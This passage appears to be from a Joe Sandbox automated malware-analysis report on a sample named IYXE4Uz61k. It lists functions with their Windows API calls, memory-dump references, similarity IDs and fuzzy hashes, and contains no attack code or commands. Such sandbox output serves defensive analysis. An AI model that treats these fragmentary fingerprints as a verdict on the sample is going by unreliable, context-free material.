                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateHeap_free
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 614378929-0
                                                                                                                                                                                                    • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                                                                                                                    • Instruction ID: d8863af7908ed42d226c7abf0c348dbd74f4b7e4c939cd649bbe2dcf408b76a0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F80149722003056BEB319F69DC8196AFBECFB85370F29051DE184C32C1EA31A805C778
                                                                                                                                                                                                    Function 00877B0D Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00877B12
                                                                                                                                                                                                      • Part of subcall function 0087CE40: __EH_prolog.LIBCMT ref: 0087CE45
                                                                                                                                                                                                      • Part of subcall function 00882089: __EH_prolog.LIBCMT ref: 0088208E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                                                                    • Opcode ID: 3932ebc0c403eac80af803ce7a82305a5155a70152689f0d98f8a2b54887cd3b
                                                                                                                                                                                                    • Instruction ID: e57546e05e6dcbfb00952eba93e91f01fbd9346634599d3b111bdc7e5bda523c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3932ebc0c403eac80af803ce7a82305a5155a70152689f0d98f8a2b54887cd3b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B0180716107459BEB24DFB8C4417AEB6F4FF08365F10892EE05AE3280D7B49904C761
                                                                                                                                                                                                    Function 0089B136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00899813,00000001,00000364,?,008940EF,?,?,008B1098), ref: 0089B177
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                    • Opcode ID: 4b3e5ede0fcf94d2508b8ffcf8ffb357aba480dadb0db37b97243348596813c9
                                                                                                                                                                                                    • Instruction ID: 3fbf9c775bcf6392a35af28645fb0b9c36ce71aa8d9d0d0c20932ef9be3a2c7b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b3e5ede0fcf94d2508b8ffcf8ffb357aba480dadb0db37b97243348596813c9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95F08932505129B7EF217A65BE15B9F7749FF51770B1C8222FC08E7190DB60DD0186E1
                                                                                                                                                                                                    Function 00893C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00893C3F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 190572456-0
                                                                                                                                                                                                    • Opcode ID: d08ed85dfdc318361b3161e029a7ce23a9e850f7798d0aaccabd307c1a663f27
                                                                                                                                                                                                    • Instruction ID: 224c3b543ef184bd1ad4ac881b836dbfac0a7e815fed91cf63dfa2ec863d9e96
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d08ed85dfdc318361b3161e029a7ce23a9e850f7798d0aaccabd307c1a663f27
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AF0E532204A169FCF11AEA8EC0499A77A9FF11B287184125FA05E7190DB31DA20C790
                                                                                                                                                                                                    Function 00898E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00894286,?,0000015D,?,?,?,?,00895762,000000FF,00000000,?,?), ref: 00898E38
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                    • Opcode ID: a3eaddae738e1b11553c1b3a78a597977470db21b869c36fdab132ec512ca6d7
                                                                                                                                                                                                    • Instruction ID: 1f1b81857cd3afb7eca6d0db729799663197b2bde35990db9723b6615af654d2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a3eaddae738e1b11553c1b3a78a597977470db21b869c36fdab132ec512ca6d7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4E03031206227D7EE7136799C15B9F7648FB537A4B1D0111AC58D6091DF20CC0092A1
                                                                                                                                                                                                    Function 00875ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00875AC2
                                                                                                                                                                                                      • Part of subcall function 0087B505: __EH_prolog.LIBCMT ref: 0087B50A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                                                                    • Opcode ID: 93239da3b539755467f8089375ee7b33e8f170e287dfaf56d908cd6e4704ee60
                                                                                                                                                                                                    • Instruction ID: d90e24e9fd20928540b1bae1c3bf060c087779ce50d6d7262688580d4519abfc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 93239da3b539755467f8089375ee7b33e8f170e287dfaf56d908cd6e4704ee60
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE018C30A10790DAD725F7BCC0417DDFBA4EF64318F51848DA45AA3282DBB41B08DBA3
                                                                                                                                                                                                    Function 0087A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0087A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0087A592,000000FF,?,?), ref: 0087A6C4
                                                                                                                                                                                                      • Part of subcall function 0087A69B: FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,0087A592,000000FF,?,?), ref: 0087A6F2
                                                                                                                                                                                                      • Part of subcall function 0087A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0087A592,000000FF,?,?), ref: 0087A6FE
                                                                                                                                                                                                    • FindClose.KERNEL32(00000000,000000FF,?,?), ref: 0087A598
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1464966427-0
                                                                                                                                                                                                    • Opcode ID: efe5d0c8e8457e8aebdba9042be3d246f64db5401761d53bb93fd57586061068
                                                                                                                                                                                                    • Instruction ID: 5e4d8048ae933c7091b94c3b1bfa382b6be18733678ac5cbba249090b1c5b2a9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: efe5d0c8e8457e8aebdba9042be3d246f64db5401761d53bb93fd57586061068
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4F08931009790AACB6657F849047CF7B90BF66331F04CA4DF5FD9219AC37590949B23
                                                                                                                                                                                                    Function 00880E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetThreadExecutionState.KERNEL32(00000001), ref: 00880E3D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExecutionStateThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2211380416-0
                                                                                                                                                                                                    • Opcode ID: 5e1c322cd5b76c160fc64460dd462b253c50ae2429a287f56eee40489090c37a
                                                                                                                                                                                                    • Instruction ID: 0b1dffe86c163417c36c3c8711f0c73486cdb9769586cc5d40753e0d6fdae54c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e1c322cd5b76c160fc64460dd462b253c50ae2429a287f56eee40489090c37a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EED0121161549556EE22332D686D7FF260AFFC6321F0D0065B14DDB686DE54888BA363
                                                                                                                                                                                                    Function 0088A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 0088A62C
                                                                                                                                                                                                      • Part of subcall function 0088A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0088A3DA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1915507550-0
                                                                                                                                                                                                    • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                                                                                                    • Instruction ID: cb720f395928d29a8b1cbc6feaad51c9aeee522ec4b933a82fdd7fe9ec0e5c0b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DDD0A93024020CBAEF0ABB65CC02A6E7A99FB10750F008022B842E52C1FBB1D910A363
                                                                                                                                                                                                    Function 0088E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DloadProtectSection.DELAYIMP ref: 0088E5E3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DloadProtectSection
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2203082970-0
                                                                                                                                                                                                    • Opcode ID: 2c7de1e22b1b7df03d9b08a144ce81a89464f2f8ca9287098315f28512f6ae04
                                                                                                                                                                                                    • Instruction ID: 852bc901022253e9dcdcc4ae456b822d28a47ce389ae1885bf4cfe2a8c218c4f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c7de1e22b1b7df03d9b08a144ce81a89464f2f8ca9287098315f28512f6ae04
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0D012B02D0251ABDB21FFACA84B7183354FB34704FD00212F155D19A5DB644480C706
                                                                                                                                                                                                    Function 0088DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00881B3E), ref: 0088DD92
                                                                                                                                                                                                      • Part of subcall function 0088B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0088B579
                                                                                                                                                                                                      • Part of subcall function 0088B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0088B58A
                                                                                                                                                                                                      • Part of subcall function 0088B568: IsDialogMessageW.USER32(00010464,?), ref: 0088B59E
                                                                                                                                                                                                      • Part of subcall function 0088B568: TranslateMessage.USER32(?), ref: 0088B5AC
                                                                                                                                                                                                      • Part of subcall function 0088B568: DispatchMessageW.USER32(?), ref: 0088B5B6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 897784432-0
                                                                                                                                                                                                    • Opcode ID: 54d03a80ac4a7c7e55063d3738b1975890ece6085c6410ba3420d3f41cacaeaa
                                                                                                                                                                                                    • Instruction ID: 61599233d7d9590aa4c50efcb3bf5bc04fa6276c75b563075f818052850829f8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 54d03a80ac4a7c7e55063d3738b1975890ece6085c6410ba3420d3f41cacaeaa
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9D09E32144300BADA023B55CD06F0A7BA6FB88B05F004655B284740B18772AE21DF16
                                                                                                                                                                                                    Function 008798BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFileType.KERNELBASE(000000FF,008797BE), ref: 008798C8
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileType
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3081899298-0
                                                                                                                                                                                                    • Opcode ID: 334cc958d0d09bc4afb8fe9b5e7e6413599e2e3e9bcd9e0ab8515fdd3ece4a4b
                                                                                                                                                                                                    • Instruction ID: fe1e0716b30a9074c94084f380f2630ec97ff703e964999d18c5c3855a8340d1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 334cc958d0d09bc4afb8fe9b5e7e6413599e2e3e9bcd9e0ab8515fdd3ece4a4b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47C00234404605968E219A2598490A97722FA533A67B4D7E4D0ADC94A5C332CC97EA12
                                                                                                                                                                                                    Function 0088E1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 0977ed3d721b09250d3f71d68ba065528191a44191afe6909c259d4b86706f24
                                                                                                                                                                                                    • Instruction ID: 208646052632298e5ed5234f2018d1d3b519c4493421aa3087a888d031c648dd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0977ed3d721b09250d3f71d68ba065528191a44191afe6909c259d4b86706f24
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 90B012D9358105BC310432891C07C3B120CF0C3B11330853FFC11C0981E840AD040933
                                                                                                                                                                                                    Function 0088E1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E1E3
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
